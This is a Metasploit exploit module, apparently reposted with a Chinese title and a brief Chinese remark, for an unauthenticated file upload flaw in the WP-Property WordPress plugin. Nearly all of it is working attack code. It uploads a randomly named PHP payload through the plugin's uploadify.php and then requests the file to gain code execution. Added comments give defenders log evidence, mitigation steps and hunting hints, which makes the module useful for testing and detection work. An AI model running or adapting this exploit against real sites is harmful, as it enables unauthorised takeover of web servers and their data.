WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

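require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 according to the module description).
#
# Root cause, as described below: the plugin ships a third-party
# uploadify.php handler that accepts a file upload without authentication
# and stores it under a web-reachable path, so an uploaded .php file is
# executed by the web server when it is requested.
#
# Defender notes:
# * Log evidence: a multipart POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part with a .php filename and a "folder" part,
#   followed by a GET for that file name.
# * Mitigation: update the plugin to a release newer than the affected
#   range, remove or deny access to the bundled uploadify.php, and do not
#   let the web server execute PHP from directories that accept uploads.
#   The fixed version is not stated on this page; confirm it with the
#   plugin vendor.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The page extraction had mangled this mixin name; it is the module
  # provided by the 'msf/core/exploit/php_exe' require above.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload
  # constraints) and the single TARGETURI option.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the presence of the upload handler.
  #
  # Returns CheckCode::Unknown when there is no response or the status is
  # not 200, and CheckCode::Appears otherwise.
  #
  # NOTE(review): this only shows that uploadify.php is reachable. It does
  # not read the plugin version or confirm that the handler accepts
  # uploads, so "Appears" can be a false positive on a patched or
  # access-restricted install. Treat the result as a lead for manual
  # verification, not as proof.
  def check
    uri = target_uri.path
    # Appends in place to the string returned by target_uri.path.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then
  # requests it.
  #
  # Fails with Failure::UnexpectedReply unless the upload response is a
  # 200 whose body contains the generated file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # File name is five random letters plus ".php"; a short random .php
    # name inside the plugin's uploadify directory is a useful hunting
    # pattern for file-integrity checks and access logs.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self presumably makes the uploaded file delete
    # itself once it has run, in which case it may be gone from disk by the
    # time responders look; web server logs are then the durable evidence.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that the MIME serializer emits before a boundary line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The handler's response body is used verbatim as the path of the
    # follow-up request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    # The response to this request is not inspected.
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end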
不要问我这写的是什么 怎么利用 我是说msf.